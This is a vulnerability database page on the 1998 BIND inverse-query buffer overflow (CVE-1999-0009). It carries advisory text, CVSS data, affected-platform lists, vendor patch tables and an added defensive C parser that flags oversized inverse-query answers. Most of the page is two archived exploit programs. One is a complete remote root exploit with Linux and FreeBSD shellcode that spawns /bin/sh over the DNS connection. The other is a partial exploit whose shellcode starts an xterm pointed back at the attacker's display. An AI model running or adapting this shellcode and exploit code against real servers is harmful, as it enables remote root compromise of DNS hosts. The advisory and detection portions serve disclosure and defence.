CVE-1999-0009
CVSS 10.0
Published: 1998-04-08 00:00:00
Revised: 2008-09-09 08:33:31

[Original] Inverse query buffer overflow in BIND 4.9 and BIND 8 Releases.


[CNNVD] Multiple vendor BIND iquery remote buffer overflow vulnerability (CNNVD-199804-012)

        
BIND is a widely used DNS server program, developed and maintained by the Internet Software Consortium.
BIND versions earlier than 4.9.7 and 8.1.2 contain a serious buffer overflow vulnerability in the handling of inverse queries; a remote attacker may exploit it to execute arbitrary instructions on the host with root privileges.
When the req_iquery() function processes an inverse name-resolution request and the user supplies over-long data, a stack overflow occurs, through which a remote attacker may obtain root privileges on the host. The vulnerability affects every system running an affected BIND version, and many attack programs are already in circulation.
<*Links: http://www.cert.org/advisories/CA-1998-05.html
 ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
 ftp://patches.sgi.com/support/free/security/advisories/19980603-02-PX
 ftp://ftp.auscert.org.au/pub/auscert/ESB/ESB-98.137
 http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba
*>
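The overflow described above comes from the server copying the RDATA of an inverse-query answer into a fixed-size buffer without bounding it. As an added illustration, not part of the CNNVD record and not ISC's BIND source, the following C program parses a raw DNS message the way a defender-side filter or IDS rule might and flags inverse queries (opcode 1) whose answer RDLENGTH exceeds a fixed buffer or claims more bytes than the message actually carries. The limit IQUERY_RDATA_MAX (512 bytes, the classic PACKETSZ), the helper names, and the sample-message builder are assumptions made for this example; the sample packets are constructed here and contain only filler bytes.

```c
/* Added example (assumed names; not BIND code): classify a raw DNS message and
 * flag inverse queries whose answer RDLENGTH is larger than a bounded buffer. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HEADER_LEN   12
#define OPCODE_IQUERY    1    /* obsolete inverse-query opcode (RFC 1035) */
#define IQUERY_RDATA_MAX 512  /* assumed size of the server's answer buffer (PACKETSZ) */

enum verdict { DNS_MALFORMED = -1, DNS_NOT_IQUERY = 0,
               DNS_IQUERY_OK = 1, DNS_IQUERY_OVERSIZED = 2 };

static uint16_t get16(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Advance past a wire-format name (labels or a compression pointer).
 * Returns the offset just after the name, or 0 if it runs off the message. */
static size_t skip_name(const unsigned char *msg, size_t len, size_t off)
{
    while (off < len) {
        unsigned char l = msg[off];
        if (l == 0) return off + 1;                       /* root label ends the name */
        if ((l & 0xC0) == 0xC0) return (off + 2 <= len) ? off + 2 : 0;
        off += 1 + l;                                     /* ordinary label */
    }
    return 0;
}

/* Parse header, skip the question section, then bound-check the first answer RR. */
int classify_dns_message(const unsigned char *msg, size_t len)
{
    if (len < DNS_HEADER_LEN) return DNS_MALFORMED;
    uint16_t flags = get16(msg + 2);
    uint16_t qdcount = get16(msg + 4), ancount = get16(msg + 6);
    unsigned opcode = (flags >> 11) & 0x0F;
    if (opcode != OPCODE_IQUERY) return DNS_NOT_IQUERY;

    size_t off = DNS_HEADER_LEN;
    for (uint16_t q = 0; q < qdcount; q++) {              /* question = name + type + class */
        off = skip_name(msg, len, off);
        if (off == 0 || off + 4 > len) return DNS_MALFORMED;
        off += 4;
    }
    if (ancount == 0) return DNS_IQUERY_OK;               /* nothing for the server to copy */

    off = skip_name(msg, len, off);
    if (off == 0 || off + 10 > len) return DNS_MALFORMED; /* type(2) class(2) ttl(4) rdlength(2) */
    uint16_t rdlength = get16(msg + off + 8);
    off += 10;
    if (off + rdlength > len) return DNS_MALFORMED;       /* claims more RDATA than present */
    if (rdlength > IQUERY_RDATA_MAX) return DNS_IQUERY_OVERSIZED;
    return DNS_IQUERY_OK;
}

/* Constructed sample: an inverse query with one answer RR (root name, type A,
 * class IN) whose RDATA is `rdlength` filler bytes. Returns the message length. */
size_t build_sample_iquery(unsigned char *out, size_t cap, uint16_t rdlength)
{
    size_t need = DNS_HEADER_LEN + 1 + 10 + rdlength;
    if (need > cap) return 0;
    memset(out, 0, need);
    out[0] = 0x12; out[1] = 0x34;                          /* id */
    out[2] = (unsigned char)(OPCODE_IQUERY << 3) | 0x01;   /* opcode = 1, RD */
    out[3] = 0x80;                                         /* RA */
    out[7] = 1;                                            /* ancount = 1 */
    size_t off = DNS_HEADER_LEN;
    out[off++] = 0;                                        /* root name */
    out[off + 1] = 1;                                      /* type A */
    out[off + 3] = 1;                                      /* class IN */
    off += 8;                                              /* type, class, ttl */
    out[off++] = (unsigned char)(rdlength >> 8);
    out[off++] = (unsigned char)(rdlength & 0xFF);
    memset(out + off, 'X', rdlength);                      /* filler only */
    return need;
}

/* Constructed sample: an ordinary standard query (opcode 0) for a.example, type A. */
static const unsigned char sample_standard_query[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,
    1, 'a', 7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 0, 0, 1, 0, 1 };

int verdict_standard_query(void)
{
    return classify_dns_message(sample_standard_query, sizeof sample_standard_query);
}

/* Verdict for a sample inverse query; truncate_to > 0 cuts the message short. */
int verdict_for_rdlength(uint16_t rdlength, size_t truncate_to)
{
    unsigned char buf[2048];
    size_t n = build_sample_iquery(buf, sizeof buf, rdlength);
    if (n == 0) return DNS_MALFORMED;
    if (truncate_to && truncate_to < n) n = truncate_to;
    return classify_dns_message(buf, n);
}

int main(void)
{
    printf("standard query        -> %d\n", verdict_standard_query());
    printf("iquery, rdlength 4    -> %d\n", verdict_for_rdlength(4, 0));
    printf("iquery, rdlength 1560 -> %d\n", verdict_for_rdlength(1560, 0));
    printf("same, cut to 100 B    -> %d\n", verdict_for_rdlength(1560, 100));
    return 0;
}
```

A legitimate inverse query carries a short RDATA (an address), so the first two verdicts are 0 and 1; an RDLENGTH far above the 512-byte buffer yields 2, and a message that announces more RDATA than it carries is rejected as malformed before any copy would happen. The same two bounds (RDATA fits the message, RDATA fits the destination buffer) are exactly what a server-side copy of the answer must enforce.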

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:sgi:irix:4.0.1  SGI IRIX 4.0.1
cpe:/o:netbsd:netbsd:1.1  NetBSD 1.1
cpe:/o:sun:solaris:2.5::x86
cpe:/o:redhat:linux:4.1  Red Hat Linux 4.1
cpe:/a:data_general:dg_ux:5.4_3.1
cpe:/o:bsdi:bsd_os:2.1
cpe:/o:sgi:irix:5.2  SGI IRIX 5.2
cpe:/o:ibm:aix:4.1.4  IBM AIX 4.1.4
cpe:/o:sgi:irix:6.0  SGI IRIX 6.0
cpe:/o:sgi:irix:4.0.5a  SGI IRIX 4.0.5A
cpe:/o:sun:solaris:2.4
cpe:/o:netbsd:netbsd:1.3  NetBSD 1.3
cpe:/o:sgi:irix:4.0.5_iop  SGI IRIX 4.0.5 IOP
cpe:/o:ibm:aix:4.1.3  IBM AIX 4.1.3
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:sgi:irix:6.3  SGI IRIX 6.3
cpe:/o:netbsd:netbsd:1.2  NetBSD 1.2
cpe:/o:sgi:irix:4.0.5f  SGI IRIX 4.0.5F
cpe:/o:netbsd:netbsd:1.3.1  NetBSD 1.3.1
cpe:/o:sgi:irix:3.3.2
cpe:/o:sgi:irix:4.0.5d  SGI IRIX 4.0.5D
cpe:/o:sun:solaris:2.3
cpe:/o:sco:open_desktop:3.0
cpe:/o:ibm:aix:4.2.1  IBM AIX 4.2.1
cpe:/o:sgi:irix:4.0.4t  SGI IRIX 4.0.4T
cpe:/o:sgi:irix:5.0.1  SGI IRIX 5.0.1
cpe:/o:sgi:irix:6.2  SGI IRIX 6.2
cpe:/o:sgi:irix:4.0.4  SGI IRIX 4.0.4
cpe:/a:data_general:dg_ux:5.4_4.1
cpe:/o:sgi:irix:4.0.5g  SGI IRIX 4.0.5G
cpe:/o:sgi:irix:4.0.1t  SGI IRIX 4.0.1T
cpe:/o:sgi:irix:5.1  SGI IRIX 5.1
cpe:/o:sgi:irix:3.3.1
cpe:/o:ibm:aix:4.2  IBM AIX 4.2
cpe:/o:redhat:linux:5.0  Red Hat Linux 5.0
cpe:/o:sgi:irix:4.0
cpe:/a:data_general:dg_ux:5.4_3.0
cpe:/a:data_general:dg_ux:5.4_4.11
cpe:/o:sgi:irix:6.1  SGI IRIX 6.1
cpe:/o:sgi:irix:4.0.2  SGI IRIX 4.0.2
cpe:/o:sgi:irix:3.3
cpe:/o:sgi:irix:5.0
cpe:/o:sun:solaris:2.5
cpe:/o:sco:unixware:2.1
cpe:/o:redhat:linux:4.2  Red Hat Linux 4.2
cpe:/o:sun:solaris:2.6
cpe:/o:sgi:irix:4.0.5e  SGI IRIX 4.0.5E
cpe:/o:ibm:aix:4.1.2  IBM AIX 4.1.2
cpe:/o:sco:unixware:7.0
cpe:/o:sgi:irix:4.0.4b  SGI IRIX 4.0.4B
cpe:/o:bsdi:bsd_os:2.0
cpe:/o:sun:solaris:2.5.1
cpe:/o:sco:open_desktop:5.0
cpe:/o:ibm:aix:4.3  IBM AIX 4.3
cpe:/a:isc:bind:8.1  ISC BIND 8.1
cpe:/o:ibm:aix:4.1.5  IBM AIX 4.1.5
cpe:/o:sun:solaris:2.6::x86
cpe:/o:bsdi:bsd_os:2.0.1
cpe:/o:sgi:irix:3.3.3
cpe:/a:isc:bind:8.1.1  ISC BIND 8.1.1
cpe:/o:sgi:irix:4.0.5h  SGI IRIX 4.0.5H
cpe:/o:netbsd:netbsd:1.2.1  NetBSD 1.2.1
cpe:/o:netbsd:netbsd:1.0  NetBSD 1.0
cpe:/o:redhat:linux:4.0  Red Hat Linux 4.0
cpe:/o:caldera:openlinux:1.0
cpe:/o:sgi:irix:4.0.5  SGI IRIX 4.0.5
cpe:/o:nec:asl_ux_4800:64
cpe:/o:sgi:irix:4.0.3  SGI IRIX 4.0.3
cpe:/o:sgi:irix:3.2
cpe:/o:sgi:irix:5.1.1  SGI IRIX 5.1.1
cpe:/o:sgi:irix:5.3  SGI IRIX 5.3
cpe:/o:ibm:aix:4.1  IBM AIX 4.1
cpe:/a:isc:bind:4.9.6  ISC BIND 4.9.6
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sgi:irix:4.0.5_ipr
cpe:/o:ibm:aix:4.1.1  IBM AIX 4.1.1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:6051  Security vulnerability in the BIND executable
*OVAL describes the method for detecting this vulnerability in detail; more technical details on detection can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0009
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199804-012
(official data source) CNNVD

- Other links and resources

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9808-083
(UNKNOWN)  HP  HPSBUX9808-083
http://www.securityfocus.com/bid/134
(UNKNOWN)  BID  134
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180
(UNKNOWN)  SUN  00180
ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
(UNKNOWN)  SGI  19980603-01-PX

- Vulnerability information

Multiple vendor BIND iquery remote buffer overflow vulnerability
Critical  Other
1998-04-08 00:00:00 2005-05-02 00:00:00
Remote
        

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* No suitable temporary workaround is available.
Vendor patches:
HP
--
HP has released a security advisory (HPSBUX9808-083) and corresponding patches:
HPSBUX9808-083: Security Vulnerability in BIND on HP-UX
Link:
Patch download:
ftp://us-ffs.external.hp.com/hp-ux_patches
Operating system and patch number:
HP-UX release 9.0, 9.01, 9.03, 9.04, 9.05, & 9.07: PHNE_13187
HP-UX release 10.00, 10.01, 10.10 and 10.20: PHNE_14617
--->>> HP-UX release 10.16: *PHNE_16232
HP-UX release 10.24: **PHNE_16204
HP-UX release 11.00: PHNE_12957
SGI
---
SGI has released a security advisory (19980603-01-PX) and corresponding patches:
19980603-01-PX: IRIX BIND DNS Vulnerabilities
Link: ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
Patch download:

http://support.sgi.com/

ftp://patches.sgi.com/support/patchset/
Patch status:
System version   Affected   Patch number
---------------  ---------  ------------
IRIX 3.x         yes        not avail
IRIX 4.x         yes        not avail
IRIX 5.0.x       yes        not avail
IRIX 5.1.x       yes        not avail
IRIX 5.2         yes        not avail
IRIX 5.3         yes        3123
IRIX 6.0.x       yes        not avail
IRIX 6.1         yes        not avail
IRIX 6.2         yes        3117
IRIX 6.3         yes        2740
IRIX 6.4         yes        2741
IRIX 6.5         no
Sun
---
Sun has released a security advisory (Sun-00180) and corresponding patches:
Sun-00180: BIND
Link:
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180&type=0&nav=sec.sba

Patch download:

http://sunsolve.sun.com/sunsolve/pubpatches/patches.html

Operating system version and corresponding patch number:
Operating system    Patch number
-----------------   ------------
Solaris 2.6         105755-07
Solaris 2.6_x86     105756-07
Solaris 2.5.1       103663-15
Solaris 2.5.1_x86   103664-15
Solaris 2.5         103667-11
Solaris 2.5_x86     103668-11
Solaris 2.4         102479-13
Solaris 2.4_x86     102480-11
Solaris 2.3         101359-10
SunOS 4.1.4         106866-02
SunOS 4.1.3_U1      106865-02

- Vulnerability information (19111)

BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(1) (EDBID:19111)
linux remote
1998-04-08 Verified
0 ROTShB
N/A
source: http://www.securityfocus.com/bid/134/info

A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data received when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.

Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.

/*
 * have fun.
 * -ROTShB
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define DEFAULT_TARGET       0
#define DEFAULT_OPTIMIZATION 0
#define DEFAULT_ANBUF_OFFSET 300
#define DLEN_VAL             4
#define NPACKETSZ            512
#define NMAXDNAME            1025
#define PRE_EGG_DATALEN      (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL             (DLEN_VAL+PRE_EGG_DATALEN)
#define BUFFSIZE             4096

struct target_type
{
  char          desc[40];
  int           systype;
  unsigned long addr;
  unsigned long opt_addr;
  int           fd;
};

struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-REL (se)",0,0xbffff21c,0xbffff23c,4},
  {"x86 Linux 2.0.x named 4.9.5-REL (le)",0,0xbfffeedc,0xbfffeefc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (se)",0,0xbffff294,0xbffff2cc,4},
  {"x86 Linux 2.0.x named 4.9.5-P1 (le)",0,0xbfffef8c,0xbfffefb4,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (se)",0,0xbffff3e3,0xbffff403,4},
  {"x86 Linux 2.0.x named 4.9.6-REL (le)",0,0xbffff188,0xbffff194,4},
  {"x86 Linux 2.0.x named 8.1-REL (se)",0,0xbffff6a4,0xbffff6f8,5},
  {"x86 Linux 2.0.x named 8.1-REL (le)",0,0xbffff364,0xbffff3b8,5},
  {"x86 Linux 2.0.x named 8.1.1 (se)",0,0xbffff6b8,0xbffff708,5},
  {"x86 Linux 2.0.x named 8.1.1 (le)",0,0xbffff378,0xbffff3c8,5},
  {"x86 FreeBSD 3.x named 4.9.5-REL (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-REL (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (se)",1,0xefbfd260,0xefbfd2c8,4},
  {"x86 FreeBSD 3.x named 4.9.5-P1 (le)",1,0xefbfd140,0xefbfd1a8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (se)",1,0xefbfd480,0xefbfd4e8,4},
  {"x86 FreeBSD 3.x named 4.9.6-REL (le)",1,0xefbfd218,0xefbfd274,4},
  {{0},0,0,0,0}
};

unsigned long resolve(char *host)

{
  long i;
  struct hostent *he;

  if((i=inet_addr(host))==(-1))
    if((he=gethostbyname(host))==NULL)
      return(0);
    else
      return(*(unsigned long *)he->h_addr);

  return(i);
}

int send_packet(int fd, char *buff, int len)
{
  char tmp[2], *ptr=tmp;

  PUTSHORT(len,ptr);

  if(write(fd,tmp,2)!=2)
    return(-1);

  if(write(fd,buff,len)!=len)
    return(-1);

  return(1);
}

int attack(int fd, struct target_type t, unsigned long offset, int optimized)
{
  char buff[BUFFSIZE], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0;

  (void)memset(dnsh,0,sizeof(HEADER));

  dnsh->id      = htons(31337);
  dnsh->opcode  = IQUERY;
  dnsh->rd      = 1;
  dnsh->ra      = 1;
  dnsh->ancount = htons(1);

  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  *ptr = '\0';
  ptr++;

  i = T_A;
  PUTSHORT(i,ptr);

  i = C_IN;
  PUTSHORT(i,ptr);

  i = 31337;
  PUTLONG(i,ptr);

  if(t.systype==0)
    {
      char c0de[] =
        "\x31\xc0\xb0\x3f\x31\xdb\xb3\xff\x31\xc9\xcd\x80\x31\xc0\xb0\x3f\xb1"
        "\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd\x80\xeb\x24\x5e\x8d\x1e\x89"
        "\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10"
        "\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
        "\xff\xff\xff/bin/sh";

      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      c0de[7] = t.fd;

      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      i = (optimized?t.opt_addr:t.addr)+offset;

      len += dlen;
    }


  else if(t.systype==1)
    {
      char c0de[] =
        "\xeb\x6e\x5e\xc6\x06\x9a\x31\xc9\x89\x4e\x01\xc6\x46\x05\x07\x88"
        "\x4e\x06\x51\x31\xdb\xb3\x04\x53\x66\xc7\x46\x07\xeb\xa7\x31\xc0"
        "\xb0\x5a\x50\xeb\x50\xfe\xc1\x51\x53\xc6\x46\x08\xb6\x31\xc0\xb0"
        "\x5a\x50\xeb\x41\xfe\xc1\x51\x53\xc6\x46\x08\xc5\x31\xc0\xb0\x5a"
        "\x50\xeb\x32\xc7\x46\x07\x2f\x62\x69\x6e\xc7\x46\x0b\x2f\x73\x68"
        "\x21\x31\xc0\x88\x46\x0e\x8d\x5e\x07\x89\x5e\x0f\x89\x46\x13\x8d"
        "\x5e\x13\x53\x8d\x5e\x0f\x53\x8d\x5e\x07\x53\xb0\x3b\x50\xeb\x05"
        "\xe8\x8d\xff\xff\xff";

      if(optimized)
        dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
      else
        dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;

      PUTSHORT(dlen,ptr);
      len += PRE_EGG_DATALEN;

      c0de[22] = t.fd;

      (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));

      i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
      (void)memcpy((ptr+i),c0de,sizeof(c0de));

      if(!optimized)
        {
          (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
          i = ALEN_VAL;
          (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
          i = DLEN_VAL;
          (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
        }
      else
        (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));

      i = (optimized?t.opt_addr:t.addr)+offset;
      (void)memcpy((ptr+(dlen-4)),&i,sizeof(i));

      len += dlen;
    }
  else
    return(0);

  return(send_packet(fd,buff,len));
}

int main(int argc, char *argv[])
{
  char xbuf[128], ybuf[128];
  unsigned long offset=DEFAULT_ANBUF_OFFSET;
  int ti, opt=DEFAULT_OPTIMIZATION, sock, i;
  int xlen=0, ylen=0;
  fd_set rd, wr;
  struct sockaddr_in sa;

  for(i=0;((target[i].addr)||(target[i].opt_addr));i++);

  if(argc<2)
    {
      (void)fprintf(stderr,"\ntarget types:\n");

      for(ti=0;ti<i;ti++)
        (void)fprintf(stderr," %-2d : %s\n",ti,target[ti].desc);

      (void)fprintf(stderr,"\nerror: usage: %s <host> [tt] [opt] [ofst]\n",
                    argv[0]);
      exit(-1);
    }

  if(argc>2)
    {
      ti = atoi(argv[2]);
      if((ti<0)||(ti>i))
        {
          (void)fprintf(stderr,"error: invalid target type %d\n",ti);
          exit(-1);
        }
    }
  else
    ti = DEFAULT_TARGET;

  if(argc>3)
    {
      opt = atoi(argv[3]);
      if((opt!=0)&&(opt!=1))
        {
          (void)fprintf(stderr,"error: invalid optimization setting %d\n",opt);
          exit(-1);
        }
    }

  if(argc>4)
    offset = atoi(argv[4]);


  if(!(sa.sin_addr.s_addr=resolve(argv[1])))
    {
      (void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
      exit(-1);
    }

  sa.sin_family = AF_INET;
  sa.sin_port   = htons(53);

  if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1))
    {
      (void)perror("error: socket");
      exit(-1);
    }

  if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
    {
      (void)perror("error: connect");
      exit(-1);
    }

  (void)printf("target             : %s\n",inet_ntoa(sa.sin_addr));
  (void)printf("target type        : %s\n",target[ti].desc);
  (void)printf("optimized named    : %s\n",(opt?"YES":"NO"));
  (void)printf("anbuff addr        : 0x%x\n",(unsigned int)
               (i=(opt?target[ti].opt_addr:target[ti].addr)));
  (void)printf("anbuff addr offset : %lu\n",offset);
  (void)printf("ret addr           : 0x%x\n",(unsigned int)(i+offset));
  (void)printf("fd to make dups of : %d\n",target[ti].fd);

  (void)printf("here we go...\n");

  switch(attack(sock,target[ti],offset,opt))
    {
    case -1:
      (void)perror("error: attack");
      exit(-1);
      break;

    case 0:
      (void)fprintf(stderr,"error: internal error\n");
      exit(-1);
      break;
    }

  (void)printf("have fun.\n");
  (void)printf("-ROTShB\n");

  while(1)
    {
      FD_ZERO(&rd);
      if(ylen<(sizeof(ybuf)-1))
        FD_SET(sock,&rd);
      if(xlen<(sizeof(xbuf)-1))
        FD_SET(fileno(stdin),&rd);

      FD_ZERO(&wr);
      if(xlen)
        FD_SET(sock,&wr);
      if(ylen)
        FD_SET(fileno(stdout),&wr);

      if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1))
        {
          (void)perror("error: select");
          break;
        }

      if(FD_ISSET(fileno(stdin),&rd))
        {
          if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          xlen += i;
          if(!(--ti)) continue;
        }


      if(FD_ISSET(sock,&wr))
        {
          if(write(sock,xbuf,xlen)!=xlen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          xlen = 0;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(sock,&rd))
        {
          if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1))
            {
              (void)perror("error: read");
              exit(-1);
            }
          else if(i==0)
            break;

          ylen += i;
          if(!(--ti)) continue;
        }

      if(FD_ISSET(fileno(stdout),&wr))
        {
          if(write(fileno(stdout),ybuf,ylen)!=ylen)
            {
              (void)perror("error: write");
              exit(-1);
            }

          ylen = 0;
          if(!(--ti)) continue;
        }
    }

  if(close(sock)==(-1))
    {
      (void)perror("error: close");
      exit(-1);
    }

  exit(0);
}

- Vulnerability information (19112)

BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND buffer overflow(2) (EDBID:19112)
linux remote
1998-04-08 Verified
0 prym
N/A
source: http://www.securityfocus.com/bid/134/info
 
A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data received when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
 
Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.

/*
 * z, thnx.
 * ganked the xterm exec from adm, thnx.
 * have fun.
 * -prym
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>

#define REMOTE
#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0
#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)

struct target_type
{
  char desc[40];
  int systype;
  unsigned long addr;
  unsigned long opt_addr;
};

struct target_type target[] =
{
  {"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
  {"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
  {"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
  {"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
  {"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
  {{0},0,0,0}
};

unsigned long resolve(char *host)
{
  long i;
  struct hostent *he;

  if((i=inet_addr(host))<0)
    if((he=gethostbyname(host))==NULL)
      return(0);
    else
      return(*(unsigned long *)he->h_addr);

  return(i);
}

int send_packet(int fd, char *buff, int len)
{
  char tmp[2], *ptr=tmp;

  PUTSHORT(len,ptr);
  if(write(fd,tmp,2)!=2)
    return(-1);

  if(write(fd,buff,len)!=len)
    return(-1);

  return(1);
}

int attack(int fd, struct in_addr us, struct target_type t,
	   unsigned long offset, int optimized)
{
  char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
  HEADER *dnsh=(HEADER *)buff;
  unsigned long i;
  int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;

  memset(dnsh,0,sizeof(HEADER));
  dnsh->id = htons(31337);
  dnsh->opcode = IQUERY;
  dnsh->rd = 1;
  dnsh->ra = 1;
  dnsh->ancount = htons(1);
  ptr += sizeof(HEADER);
  len += sizeof(HEADER);

  *ptr = '\0';
  ptr++;
  PUTSHORT(T_A,ptr);
  PUTSHORT(C_IN,ptr);
  PUTLONG(31337,ptr);
  dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
  PUTSHORT(dlen,ptr);
  len += PRE_OF_DATALEN;

  memset(ptr,'X',(sizeof(buff)-(ptr-buff)));

  if(t.systype==0)
    {
#ifdef REMOTE
      char c1[] =
	"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
	"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
	"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
	"\x80\xe8\xcc\xff\xff\xff";
      char c2[] =
	"/usr/bin/X11/xterm\xff-display\xff";
      char c3[32];
      char c4[] =
	"\xfe\xe8\xb1\xff\xff\xff";

